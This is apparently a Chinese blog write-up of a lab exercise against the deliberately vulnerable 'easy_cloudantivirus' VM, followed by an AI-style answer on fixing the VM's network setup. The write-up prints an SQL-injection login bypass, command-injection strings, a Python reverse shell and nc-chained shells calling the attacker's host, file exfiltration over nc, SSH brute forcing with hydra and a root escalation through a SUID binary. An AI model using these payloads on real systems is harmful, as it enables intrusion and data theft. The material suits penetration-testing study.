打靶第二周-easy_cloudantivirus

靶机地址

easy_cloudantivirus

攻击手段

  • 端口扫描
  • WEB侦查
  • SQL注入
  • 命令注入
  • 密码爆破
  • 代码审计
  • NC串联
  • 本地提权

所用工具

arping
nmap
hydra
nc
burp
sqlite

开始攻击

主机发现

使用arping来发现
因为arping一次只能扫一个可使用for i in $(seq 1 254);do arping -c 2 192.168.168.$i;done来扫描网段
在这里插入图片描述

也可使用nmap 192.168.168.0/24发现主机

在这里插入图片描述
可看到目标主机开了22和8080端口,扫描具体的端口和服务nmap -p22,8080 -sV 192.168.168.14
在这里插入图片描述

访问8080
在这里插入图片描述
发现是一个云病毒扫描
需要使用邀请码登录。
这样就有两种方法

  1. 暴力破解
  2. sql注入

sql注入

抓包后,可以尝试所有的特殊符号33个。发现"报错查看页面后
在这里插入图片描述
看到sql语句
select * from code where password="' + password + '"
这样就可以闭合sql语句
使用or 1=1使条件永为真
即输入"or 1=1--+
在这里插入图片描述
成功进入
当输入hello中时
在这里插入图片描述

命令执行

由上面得,我们猜测在后端执行的命令得逻辑为
avscan hello |ls
这样输入hello |ls得到
在这里插入图片描述
成功!

反弹shell

因为本机有python2环境,可使用上次使用的反弹shell

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.168.13",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

但这次尝试nc反弹shell

查看是否有nc

hello |which nc
在这里插入图片描述
返回了路径,证明有nc

开启侦听nc反弹

kali端执行nc -nlvp 4444命令
浏览器执行hello |nc 192.168.168.13 4444 -e /bin/sh失败了
可能是因为此nc版本不支持-e参数
删除-e,可收到链接。
hello |nc 192.168.168.13 4444
在这里插入图片描述

nc串联

先在kali开启两个监听,分别监听3333和4444端口
在浏览器执行命令hello |nc 192.168.168.13 3333 |/bin/bash |nc 192.168.168.13 4444
两个nc都收到了返回,在3333端口执行命令,会在4444端口看到返回!
在这里插入图片描述
分析hello |nc 192.168.168.13 3333 |/bin/bash |nc 192.168.168.13 4444
执行后会先在3333端口建立链接,这时在3333输入任何命令都会调用/bin/bash,执行之后从4444端口输出

查看文件

有app.py和datebase.aql
file database.sql

尝试sqlite失败,这样可以下载下来查看

下载文件

开启nc侦听5555端口并将得到的数据存入db.sql。
nc -nlvp 5555 > db.sql
之后在3333端口执行nc 192.168.168.13 5555 < database.sql
在这里插入图片描述
并使用sqlite打开
在这里插入图片描述
可看到插入数据。

查看目标中有哪些用户

在3333端口执行cat /etc/passwd
在这里插入图片描述
使用cat /etc/passwd | grep /bin/bash筛选出具有shell执行权限的用户
在这里插入图片描述
有三个:root,cloudav,scanner

制作字典

创建vi user.txt
在这里插入图片描述
创建vi pass.txt
在这里插入图片描述

ssh爆破

命令hydra -L user.txt -P pass.txt ssh://192.168.168.14

在这里插入图片描述
可惜失败了!

查看其他文件

在上一级目录中发现了相同名称的文件
在这里插入图片描述
ls -l后发现updata_cloudav文件得所有者是root
在这里插入图片描述
这样若我们能进行命令注入将得到root权限
查看源文件cat update_cloudav.c
在这里插入图片描述
可看到在执行该文件时需在后面加命令
猜测
看到调用了log
猜测也可调用nc

提权

再次使用./update_cloudav "a|nc 192.168.168.13 5555 | /bin/bash |nc 192.168.168.13 6666"并监听5555和6666。
在这里插入图片描述
这样就得到了root权限!!

补充:暴力破解邀请码

kali自带字典位置/usr/share/wordlists
选中字典后使用burp suit进行爆破。

总结

本次实验包含

  • 主机发现
  • 端口扫描/服务发现
  • sql注入/爆破
  • 命令执行
  • ssh爆破
  • suid提权

勇于尝试,遇到失败转换思路,不要气馁。

<think>好的,用户现在遇到了关于“boredhackerblog-cloud-av”靶机无法获取IP地址的问题。我需要帮他们解决这个问题。首先,我得回忆一下常见的虚拟机网络配置问题,尤其是VirtualBox环境下,因为用户提供的引用中提到使用的是OVA文件,这通常与VirtualBox相关。 首先,用户可能没有正确配置虚拟机的网络适配器。VirtualBox默认使用NAT模式,但这可能会导致靶机无法获取可被攻击机(如Kali)访问的IP地址。需要建议用户检查网络设置,改为桥接模式或Host-Only模式,这样靶机可以获得同一网段的IP。 接下来,用户可能需要启动虚拟机后手动运行DHCP客户端来获取IP。特别是如果靶机基于Linux系统,可能需要使用dhclient命令。此外,查看网络接口的配置是否正确也很重要,比如使用ifconfig或ip addr命令检查是否有活动的网络接口,并确认是否分配了IP地址。 然后,ARP扫描和nmap扫描是常用的方法,用于发现同一网络中的设备。用户可能需要在攻击机上执行这些扫描,以确认靶机是否存在并获取其IP地址。如果扫描不到,可能需要检查防火墙设置,确保没有阻止DHCP请求或网络通信。 另外,用户提供的引用中提到靶机的IP是10.0.2.13,而Kali的IP是10.0.2.10。这可能意味着他们使用的是Host-Only网络适配器,或者VirtualBox的NAT网络。如果用户使用的是NAT网络,可能需要配置端口转发,但通常桥接或Host-Only更适合渗透测试环境,因为它们允许同一局域网内的通信。 最后,如果所有步骤都无效,可能需要检查OVA文件的完整性,重新导入或重新下载文件。有时候,虚拟机的配置文件可能损坏,导致网络服务无法正常启动。 需要将这些步骤分点整理,确保用户能逐步排查问题。同时,提醒用户在操作过程中注意网络适配器的选择,以及命令行工具的使用方法。可能还需要解释一些术语,如桥接模式和Host-Only模式的区别,帮助用户理解为什么需要更改这些设置。</think>针对boredhackerblog-cloud-av靶机无法获取IP地址的问题,以下是分步排查方案: 1. **检查虚拟机网络配置** - 在VirtualBox中选中靶机 -> 设置 -> 网络 -> 选择**桥接网卡**或**Host-Only适配器** - 确认攻击机(kali)与靶机使用同类型网络适配器 - 典型配置示例: ```bash 攻击机IP:10.0.2.10/24 靶机预期IP段:10.0.2.11-254/24 ``` 2. **启动后获取IP操作** ```bash # 在靶机控制台执行(需有系统权限) dhclient -v eth0 # 强制更新DHCP租约 ifconfig/ip addr # 查看实际分配的IP地址 ``` 3. **使用扫描工具定位** - 在攻击机执行ARP扫描: ```bash arp-scan -l --interface=eth0 ``` - 使用nmap扫描目标网段: ```bash nmap -sn 10.0.2.0/24 ``` 4. **验证防火墙状态** - 在靶机检查防火墙规则: ```bash iptables -L -n -v # Linux系统 systemctl status firewalld ``` 5. **特殊配置检查** - 确认OVA文件导入时勾选**重新初始化所有网卡MAC地址** - 检查VirtualBox全局网络设置: ```bash 文件 -> 主机网络管理器 -> 创建/启用Host-Only适配器 ``` **注意**:该靶机实际部署后默认通过DHCP获取IP,若仍无法发现,可尝试通过VirtualBox控制台直接查看启动日志: ```bash VBoxManage showvminfo "easy_cloudantivirus" --details ```
评论 6
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值